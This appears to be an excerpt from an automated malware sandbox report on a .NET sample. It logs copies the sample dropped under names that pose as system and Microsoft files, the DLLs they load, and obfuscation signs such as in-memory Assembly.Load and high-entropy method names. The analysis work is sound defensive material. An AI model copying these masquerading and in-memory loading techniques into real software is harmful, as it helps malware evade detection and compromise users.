Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: version.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: amsi.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: userenv.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: wbemcomn.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: rasapi32.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: rasman.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: rtutils.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: version.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: amsi.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: userenv.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: wbemcomn.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: rasapi32.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: rasman.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: rtutils.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: version.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: amsi.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: userenv.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: wbemcomn.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: rasapi32.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: rasman.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: rtutils.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Directory created: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Directory created: C:\Program Files\Microsoft Office 15\ClientX64\ee2ad38f3d4382 Jump to behavior
Source: XPC5PMKegV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: XPC5PMKegV.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: XPC5PMKegV.exe Static file information: File size 1253376 > 1048576
Source: XPC5PMKegV.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x12e600
Source: XPC5PMKegV.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

barindex
Source: XPC5PMKegV.exe, shHQreaeBMM9abhddjw.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: XPC5PMKegV.exe, wB47m2rBZFiZqaQq5LQ.cs .Net Code: doBJWyeqP0 System.AppDomain.Load(byte[])
Source: XPC5PMKegV.exe, wB47m2rBZFiZqaQq5LQ.cs .Net Code: doBJWyeqP0 System.Reflection.Assembly.Load(byte[])
Source: XPC5PMKegV.exe, wB47m2rBZFiZqaQq5LQ.cs .Net Code: doBJWyeqP0
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Code function: 32_2_00007FFD347AA810 push edi; retf 32_2_00007FFD347AA816
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Code function: 41_2_00007FFD347A5A95 push ds; retf 5F4Bh 41_2_00007FFD347A5B0F
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Code function: 41_2_00007FFD347A0F23 push E8FFFFFFh; ret 41_2_00007FFD347A0F39
Source: XPC5PMKegV.exe Static PE information: section name: .text entropy: 6.988119508345658
Source: StartMenuExperienceHost.exe.0.dr Static PE information: section name: .text entropy: 6.988119508345658
Source: System.exe.0.dr Static PE information: section name: .text entropy: 6.988119508345658
Source: xMLVfJVxhYAkoCJ.exe.0.dr Static PE information: section name: .text entropy: 6.988119508345658
Source: xMLVfJVxhYAkoCJ.exe0.0.dr Static PE information: section name: .text entropy: 6.988119508345658
Source: XPC5PMKegV.exe, wB47m2rBZFiZqaQq5LQ.cs High entropy of concatenated method names: 'klPJp1BaY5', 'CZFJBNPgPU', 'EJBJftJk9w', 'QEnJ0KRi2o', 'LRVJx9HvB1', 'vThJ9UK1wh', 'AbxJgUM47C', 'v44AFeEX0F7tWDyneIC', 'uqR6aPEfAD41E6y0K45', 'YMHYW6EbKpbZY3AjyRM'
Source: XPC5PMKegV.exe, U1SlpSrMrLSqCCuHBJh.cs High entropy of concatenated method names: 'XctXUXp35J', 'nmoX7hCxwS', 'oyEXzdbtXU', 'qZWStiOwHs', 'r0ISwq08ct', 'H2ASc7r5KP', 'BPtSJ5kBU3', 'di8SX0vxmv', 'pGhSSMoYuN', 'tFM9iJVqv7GEOZ30Tp4'
Source: XPC5PMKegV.exe, XsCsYiajpINURvkh10.cs High entropy of concatenated method names: 'roP8Tq2MV', 'rf7oAjZMFgjiv6chtv', 'tpMo8fSj49jeQuX2mQ', 'cMxE2UFYnLwGS9m16n', 'FBYolDC5HhJH2Pyau5', 'GyD3HtDyYCfSYVXofL', 'mecciBLse', 'uNmJGGSxB', 'GokX6VN1h', 'nZGSQiokg'
Source: XPC5PMKegV.exe, gP66Xyrlu7B2MJrjUgL.cs High entropy of concatenated method names: 'BIvr3c1Buq', 'LIsQBvI6JJivDA5dKX3', 'TVNpQRITu3mM81OMVMY', 'gdhkJ2IN8t4dQK9a4bv', 'xGGcglIiQiT1nv2dTur', 'Rw6TbwIywd2wDrPI01H', 'Ay6rT4Mldy', 'X8trVKiFXj', 'zx1rn3Fh5Q', 'hGdrMIIUgq'
Source: XPC5PMKegV.exe, f0g1VaXtropEBiD1PE.cs High entropy of concatenated method names: 'a2n', '_7WJ', 'Xk2', 'B28', 'pMNKE04lSllj0cb3LE6', 'FJIZdA4mBpq5uqfa4xy', 'CvkEE44YTxnLMjxWWk4', 'WR4Vo44K8QF3W1uDemc', 'bbWhDM49wOYQ5fHBdUj', 'Aoq6e34akGy4VFnRSAl'
Source: XPC5PMKegV.exe, dURg8F6dkDPGvbBqMne.cs High entropy of concatenated method names: '_13J', '_7WJ', 'G8c', 'B28', 'TYxSyIJZeaSG0l1U9BV', 'TjTkaDJC9V8Xjomok6m', 'KEjmCdJDFJipGoQA0lW', 'XHPUqjJs7Jm1yotqsdl', 'X8Tq2ZJ18L0T5YOHtvh', 'gTAMUxJQloIms1PAsEq'
Source: XPC5PMKegV.exe, kSNeX2rcW1LrxBgpvHe.cs High entropy of concatenated method names: 'vZqJ67sVTM', 'rZ6LdwP3btvb6XrdKrv', 'OfgBm3PR0CPtE8RF1T6', 'lO3yOuPBn9Zge7NAceb', 'tIbXgmPrKu5GMVKM8jX', 'oVUWqGPHff7rOg5clLU', 'BsEVSCPJegpKurZphR9', 'riJrqRP7HO7QGBtjirw', 'UImteqPx1iplffLstZP', 'D1MOoaPE6fG9t7NbsAI'
Source: XPC5PMKegV.exe, qOmHthTWMfS31ZWNfw6.cs High entropy of concatenated method names: 'z2SyC7pV97', 'M0jyib5UIb', 'z1qyOjvLRc', 'YaNG5QLWBfD9TQqAFoj', 'SiOaDkL9XVJJuNaZyLy', 'kVhIkjLa3CWtsxbxKoJ', 'OZnsgfLgsNK0tmUZS6V', 'q64ysHxowt', 'nAGyrgRZkV', 'ThLy4vUPwS'
Source: XPC5PMKegV.exe, jmryIT6LRxfHDNEwtNE.cs High entropy of concatenated method names: 'tvS', '_7WJ', '_769', 'B28', 'pc0199BKiUgcuWumW7c', 'mmQb4HB9dYFPlEsoG7x', 'YDmRDGBatuhOMkMYiEg', 'f7PR39BWwLlsJ4VIH2q', 'CDutHNBg86hnPNjjqJG', 'KGIko3BOPaIvOsK8NAG'
Source: XPC5PMKegV.exe, aigRxK66o2JkKkQOuwS.cs High entropy of concatenated method names: 'sf4', '_7WJ', 'xcX', 'B28', 'tRXIK1BAIJn8xTAU9YT', 'Jm6st9BMOZdiu8Dy66a', 'RAKxlYBL4DtHvAc6ED5', 'JeWoqkB0Si98xPwNUlG', 'mLroZEBuNggTINnXHOw', 'KMRampBjl8Moq3nINlP'
Source: XPC5PMKegV.exe, SvVP5Xr1bb6rw0sEojD.cs High entropy of concatenated method names: 'IpuSaU4S4g', 'sGnYHYeG8YfUI3pMtDc', 'giA0uVe4WT0Ju2BOFj5', 'JRUCL4ek2rUAl0ygbdo', 'XATN3Xe83CrQlhJOPf0', 'tMlHSje2ZR0vhUyaoXE', 'IXtFQveByFJSAWks1h6', 'sYN5UQer4lBcbkWFjVI', 'YAJjHie3H8BtubKTmqG', 'YANYA3eRmanCphdXvJB'
Source: XPC5PMKegV.exe, GwZmroUmdl1FnlK3Hqj.cs High entropy of concatenated method names: 'aeEamdfJK6', 'W4y', '_854', 'lF2', 'g2EakN9upP', 'e61', 'h28aY6idsS', 'ocma3x57Pk', 'ft5', 'mtWaZMgQpA'
Source: XPC5PMKegV.exe, VsuGNOpVOaCgmZPSxI3.cs High entropy of concatenated method names: 'fRv10nguhH', 'Tf11xixl6H', 'Js319AoKA1', 'ELy1gwPOih', 'YBg1qZM7HU', 'UVo2kRo4r26G4chvEAr', 'prsyAIo26DsR1We3Opl', 'x9S7LXo8DjScmP5OYEv', 'APBdQWoGVdw4q4KHOmS', 'PSloIloBusRB8DxOT9n'
Source: XPC5PMKegV.exe, uVWQMdTDao62x74yYIh.cs High entropy of concatenated method names: '_9Yl', 'yN7bx0Ga9p', 'l0xyUKMQio', 'dlibcFtNPA', 'dx8v6C0TvNP28T2m4cm', 'PiZBGp0NxdcVJJ1nbRg', 'JEJ1ny06nLbYxGY2o71', 'IimqVu0ODhxC6owWu8m', 'NiE9PX0UxdNFlKbfSrT', 'm4yrGc0iVWh2XwxbI2f'
Source: XPC5PMKegV.exe, kVspcdp0Ws1AhcBomLC.cs High entropy of concatenated method names: 'Y54', 'Lc3', '_3f3', 'pt9', 'nBO', '_74N', '_777', 'oG5', 'Ry1', '_3bJ'
Source: XPC5PMKegV.exe, f4F69MHjfSPQjQKxqv.cs High entropy of concatenated method names: 'j37', '_7WJ', 'm1w', 'B28', 'Rw0q7d2nw', 'dGeZfH8wSjPgHbPq0kq', 'SfI0B28AVJhTq5q1sby', 'vOFt7a8MXkiBcghUJck', 'IdTh7a8LgAlRR6AFXgZ', 'hVgT9l80WrosyThYnH8'
Source: XPC5PMKegV.exe, vdX68oG6iUH6GgQPnR.cs High entropy of concatenated method names: 'V3p', '_7WJ', 'YGt', 'B28', 'kLUvKZ8JwQV1eH1tQW8', 'p3CHGQ8792CUFLS8Q1F', 'x8jZrD8x7aN2rSForFx', 'ORPIhg8EvXjVy3jLy7R', 'vm0Jb88PdjfNivS9YFf', 'tn2v9g8pSuG6WHmBBqH'
Source: XPC5PMKegV.exe, dAL6YO6v32wJSdICWdx.cs High entropy of concatenated method names: 'p1JwNpaPVb', 'lXIuJDHGcWo7NySMISN', 'aRDZoEH49wijEo2co1m', 'igvmcrHksyVvSbKZYBV', 'OhShY5H85BbHQQvUoTS', 'YNWu2GH2Gd2axafyOeR', 'B8ydEvHBtQruZqlGhQv', 'R9F1KDHr3HFHjvSDqUP', 'FD7wos5enB', 'cWHvxCHHahhf9H9Cere'
Source: XPC5PMKegV.exe, OlwfVgUoUd7sNOSQ8ec.cs High entropy of concatenated method names: 'kuQDiklHcKuk6JlXpwp', 'upoqHklJRfRtN0Lh83I', 'T9TUKGl3mWBemSliOMa', 'ohSFnPlRv5DKlrqUEUC', 'M4rdfLB1bk', '_71i', '_951', 'PHEd0gZarL', 'cEfdxjX4Ok', 'cPWd91nno1'
Source: XPC5PMKegV.exe, jdiRBg61JN4QAi2oOJT.cs High entropy of concatenated method names: 'BQbwHsVpC7', 'uhXOFPHnkrQMt7gagwE', 'hYvC6pHoIbiR87a3F2h', 't47FiaHuHDKZmA3VPDC', 'WmP6H7HjWSMY6TbiPHp', 'bh7yIMHfyukRbwZLdc4', 'amy', '_7WJ', '_3TA', 'B28'
Source: XPC5PMKegV.exe, HDV9hypI26pClCBBdee.cs High entropy of concatenated method names: '_364', 'kDNIVjC5xC', 'xinIn2AXNA', 'K7aIM0Rbfg', 'J98IQytiSi', 'W9vImP80qG', 'AdKIk5hPt6', 'PiGtALobq0dvHVD8as1', 'PgcWJJoXggB2rxB9bGo', 'DanMiDooZC0Unv8MQWo'
Source: XPC5PMKegV.exe, ye8aWNTqk0b1FcRsZ1n.cs High entropy of concatenated method names: 'A9l', 'vy1bG0DnFZ', 'yyivtghAKC', 'DWpbQuFbhC', 'RyYY6Ku8NCPtkYbAvmH', 'axCvGHuG4qXCIsgnguk', 'gFjwm8u47vblwAkxMof', 'rWa1S4uqRiexWPDPI25', 'GLTOr6ukh6jJ3WuQlqH', 'aNJrrXu2cr4QnJ7w5FI'
Source: XPC5PMKegV.exe, SLLPugr8pKR7lGVhAUp.cs High entropy of concatenated method names: 'tFrc3efu53', 'T2GcZNSKXO', 'EmwcdvUmgw', 'g0mjMd7CoepsiBRyno8', 'sq8K1S7DEiCClQg1Jbm', 't6eQ0v7sG60REJ7DPFr', 'UM8ciT71WuWmKUvtBWi', 'LEf1TO7Qb4e3akKgNPs', 'KqIOQZ7vPvc4IlUc372', 'zxjj2T7FViYGAFENepL'
Source: XPC5PMKegV.exe, kIPDhH6Eh9gEOt304bk.cs High entropy of concatenated method names: '_6L9', '_7WJ', '_5E1', 'B28', 'AipQ323zxfxQw3VOluy', 'S2c24QRqEiNwMv82IJV', 'pDgsYSRkFM59v8r3neG', 'yQScivR8AenBYc89moV', 'BnUvrTRGPLvMTTtpVj6', 'A2hxaZR4QAA6816v6Gl'
Source: XPC5PMKegV.exe, THa8RgTPonEo7fqnLPu.cs High entropy of concatenated method names: 'l8M4Bc8CyJ', 'xyC4foT82E', 'jrH400nmL6', 'iFhp3eMIPVJFWDpXelK', 'ildeboMV7Uty5DWycA9', 'hoY1T8MenxcDcGSWIHs', 'S8Sex3Mw4v0Ljc1Dbhe', 'zyK4CLLnJg', 'X0O4ijGFD4', 'D9g4OKHttg'
Source: XPC5PMKegV.exe, X5lCJea0qEIjZsFB0lI.cs High entropy of concatenated method names: 'm9NHuEddHds04', 'pTjZSQYAFE8CFm1b1yg', 'tBUsIcYMwHkVg4AvNMm', 'j6tpFuYLwNq4DKDed5Q', 'lRY6BaY07HbXC8NqQ4P', 'Ld96E0Yu8OlPS8NCqli', 'dZDymAYI6nWpvwoDHGf', 'zKR6TfYw6NvOZgilP4w', 'uKq2hYYj6fZLqOLMqWX', 'VFW9wOYnQm2xs01NY32'
Source: XPC5PMKegV.exe, i1jdsTLl85OCES0PtGu.cs High entropy of concatenated method names: 'Fev3j297h1', 'gQg3KLj2AW', 'OOt', '_8Md', 'qrX', '_1N5', 'x8o', 'xxn3aN1WdA', '_2m4', 'v4c'
Source: XPC5PMKegV.exe, exil7e6cwtaPeLExwKG.cs High entropy of concatenated method names: '_93E', '_7WJ', '_855', 'B28', 'N3hRDwrtPy6pDwmWKpZ', 'jeOidFrhPmLItC8Iw4r', 'Fb4UK1rdjSsd8rxIeZH', 'UDXObhrlZCrxZqKncC9', 'oIfdn6rmDThkhqKyXF4', 'ko0RQxrY1hMXxB5ZCEp'
Source: XPC5PMKegV.exe, bprgVi6la5IXptQf6Vi.cs High entropy of concatenated method names: 'gipcmjt3ae', 'ECncknawPg', 'fNccYlCyij', 'qpRETa77DrAgiN2vLdO', 'Xu4vHn7H4bwfGtv9OWc', 'KPANeI7JUUIpUAYjesb', 'Gtksgy7xpZFcBf6KNnw', 'wFgquW7ECMBNMaTr7CA', 'YVKXFJ7PGNoVlsSnKMt', 'cy7kF77pnQTylNUoyxi'
Source: XPC5PMKegV.exe, T1JNqcgrHbtUAc4YqQ.cs High entropy of concatenated method names: '_695', '_7WJ', '_472', 'B28', 'TylmMb2BDJXTi2EavI0', 'hOfoDE2rU9gtK6MQVlm', 'm7jPKs23xaTfvPpvhJ5', 'JKsrTT2RGwMjx12egdi', 'EFd59U2HEqBPHkyNMRY', 'AJIS4e2JmxAUfxUKFMN'
Source: XPC5PMKegV.exe, K0nqIZTKp3pvByNf7CQ.cs High entropy of concatenated method names: 'D1PPNEjlqlycPAjqwWa', 'n5jW07jm2cEuge2k8AD', 'vrFYLNjhxoTvYsDmeHF', 'L8gcEKjdxasgBRwXBrZ', '_26G', 'z33', 'kMxvO35rxg', 'w2qvbdRpy2', '_987', 'mc1vTw3t6o'
Source: XPC5PMKegV.exe, HwlW5eThgMUHaYWFXQ4.cs High entropy of concatenated method names: 'sqV4eH8ceg', 'Enb4uwF5gA', 'EWy4Eq0ond', 'gL2xJDMgLcHnnUNtljc', 'uj0ls5MOC8Q1kJqd3Yh', 'II3QAHMURmBu3lZx8Kl', 'dYMkADMTtZvAMAHSPfZ', 'Gso6kYMNHWu4tFmweGO', 'FVC6fSM67nq0pURI96J', 'KxjPQ5MiHhdMqljkhYf'
Source: XPC5PMKegV.exe, onc0N3TSIib8Dtmf3H6.cs High entropy of concatenated method names: '_7n5', 'iS6', 'IkmbuiFJVl', 'OSX', 'W2AbmLQE2v', 'oiV92muiGngTu8XqMgF', 'fmMF5OuyZf934NsHPg4', 'n406yOuzxePoglRtRNL', 'Iu5p1HjqUdoPoiHpRNN', 'BThaUtjkOvm5Q0fxp1N'
Source: XPC5PMKegV.exe, bDZaFDUMwF69yLGvilu.cs High entropy of concatenated method names: 'VE0dyygSkF', 'ra3dvNJRPk', 'p9vdD9AVY6', 'U1s', 'yYS', '_79P', '_5lh', 'j46', 'J63', 'Wned1CT082'
Source: XPC5PMKegV.exe, RCS9MN6Fmifw4GBeIY9.cs High entropy of concatenated method names: '_95T', '_7WJ', '_5Kd', 'B28', 'gDPYTm3kx2QAZBaGSMh', 'yDR0TB389H1MCb2QReq', 'IiZnGF3GXe8u7Qs90VK', 'r9OSnx34AhPRRhyDrC2', 'BwDI1q32QWciSXrKQCM', 'NVnykh3BvQi7M8sfijS'
Source: XPC5PMKegV.exe, TbNhVJUyCnnERU7Xiib.cs High entropy of concatenated method names: '_9Xh', 'pA2', '_5v5', '_4m5', '_1I6', 'ynJ', '_15m', 'V8n', '_753', 'c15'
Source: XPC5PMKegV.exe, d8ilVI6iXvaEFUhlrfp.cs High entropy of concatenated method names: '_4wN', '_7WJ', '_526', 'B28', 'Kba65O3sHSD5C0DJRC5', 'Ljrcbn31lV3gmw1eadW', 'KGuyX93Qsvin0MXYUhr', 'vIu5R43vIJlBdolfChD', 'TCMh4Q3thrsc1daKh0E', 'dvu0Nx3hq1DBosH5xmU'
Source: XPC5PMKegV.exe, lSWdvHLBf90iO6VyMDw.cs High entropy of concatenated method names: 't11Yny2aeA', 'w5AYMiuQnB', 'pulgNlsz2skhlekKUgD', 'S8QugC1qMpgXsWu79Z7', 'DHGTZm1k4aVAsa5O58J', 'pG7nUa18vWAnijp4M9e', 'wlJ0dG1G76po8SxH73L', 'qV0IVv14FULPs4C4sUP', 'zTfyjH12NJkJuv0YqT9', 'm3JDuZ1BpimW6ebFXPU'
Source: XPC5PMKegV.exe, N7KIuaSn0C2OaIkIcD.cs High entropy of concatenated method names: '_321', '_7WJ', '_726', 'B28', 'Vonuj52XxaCHybhuVFf', 'NmRmgZ259JVQKyMeYgm', 'Fi64wY2S2mbaQJT1hQm', 'haUREo2FE23epVxc4iI', 'gmAnXw2ZZguWay1j0vE', 'H4F0Ku2CS6h7qxjZ9lw'
Source: XPC5PMKegV.exe, WRp7jS6yDNlWjHCys6b.cs High entropy of concatenated method names: '_1I3', '_7WJ', 'Aa7', 'B28', 'rCvuAa391vspjZdigri', 'NIgQyA3a0ujlGFI1PSX', 'WiZpoE3W258LTEqxryb', 'Orpaad3gjM76gdZ9r7i', 'DT4icJ3ODWPZRBbTOb2', 'dyDkOJ3UiTp6oGUQs14'
Source: XPC5PMKegV.exe, W2G0gDTF8W9Ih1wSuug.cs High entropy of concatenated method names: 'lQt4249fxa', 'C9Z4HUBhwW', 'jC94FdJClF', 'KkF460Xfsc', 'SC34LugP6t', 'K4rXxILJx8owy9bJN90', 'QWSFWOL7w8XsqbQtmpv', 'SKcU6sLRn25UXF78vUx', 'i9cK7DLHjAUh6WbGMjT', 'tIob9JLxYlCMHju52nC'
Source: XPC5PMKegV.exe, shHQreaeBMM9abhddjw.cs High entropy of concatenated method names: 'LHWbEuYFS0GnZMKK5A6', 'WLtca6YZCSXDSOZ4xgY', 'A8MvTGY5brfY9ZmhA98', 'MRFWbiYSpXkpc3d2Jtl', 'blVRWeNs3I', 'M6NreiYsCpI1JoIQdXq', 'i6js3tY1pK5nHc7wYqG', 'FgV9TnYQZC2EHghHd8k', 'TyExi4YvewWsJciCr3u', 'F1X8NvYt0Jvm2fL4QjQ'
Source: XPC5PMKegV.exe, tmoy8rLYPKw2P7OamUs.cs High entropy of concatenated method names: 'x4nY2ulsWn', 'EJPYHgxGFF', 'YmlYFD43P6', 'QVMY6osbhu', 'naJYLwRD23', 'J57YUpZSCh', 'xYYtXT1TLP0QXpXqMaZ', 'nAXlcE1O5C4tsTRlHSo', 'QiDbYf1U6YqQqjQmCeO', 'trJTcl1NMV7F9l0lgd6'
Source: XPC5PMKegV.exe, dEV9PYayGfcqGk0XZux.cs High entropy of concatenated method names: 'PsvRYW42JN', 'GWfR3wV9iH', 'T1VRZCbOS5', 'NdPRdNbYaB', 'DrvRjOO1LX', 'NkJRKyZU5h', 'DQaRanoBam', 'EaARPgdZsE', 'oHsRRlYAZ0', 'wkHRpbeWMY'
